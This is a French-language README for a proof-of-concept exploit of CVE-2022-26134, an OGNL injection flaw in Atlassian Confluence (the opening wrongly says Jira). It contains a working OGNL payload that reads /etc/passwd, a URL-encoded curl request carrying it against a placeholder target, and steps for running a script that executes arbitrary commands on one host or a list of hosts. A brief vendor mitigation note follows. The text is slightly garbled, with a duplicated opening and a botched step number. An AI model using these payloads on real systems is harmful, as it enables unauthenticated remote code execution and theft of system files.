
Un simple PoC pour l'exploitation d'Atlassian Jira. Permet l'exécution de code pour un utilisateur non autorisé sur un serveur.
Un simple PoC pour l'exploit Atlassian Jira. Permet l'exécution de code pour un utilisateur non authentifié sur un serveur.
CVE-2022-26134 - Vulnérabilité d'injection OGNL.
Script de preuve de concept qui exploite la vulnérabilité d'exécution de code à distance affectant Atlassian Confluence 7.18 et versions antérieures. La vulnérabilité d'injection OGNL permet à un utilisateur non authentifié d'exécuter du code arbitraire sur une instance Confluence Server ou Data Center.
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Exemple avec la commande CURL :
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
Ensuite, le résultat de la commande sera reflété dans le paramètre X-Cmd-Response de l'en-tête de réponse.
Recommandations d'atténuation des fournisseurs
Suivez les recommandations officielles d'Atlassian : https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian a publié les versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 et 7.18.1 qui contiennent un correctif pour ce problème.
1. git clone https://github.com/iveresk/cve-2022-26134.git
2. cd cve-2022-26134
3. pip install -r requirements.txt
4. Ex#1: python3 cve-2022-26134.py <IP> <COMMAND> - command is optional - default will be set as "whoami" just to check if your server is vulnerable
5. Ex#2: 4. Ex#1: python3 cve-2022-26134.py <FILE-WITH-IPs> <COMMAND>
Vous êtes libre de me contacter via Keybase pour tout détail.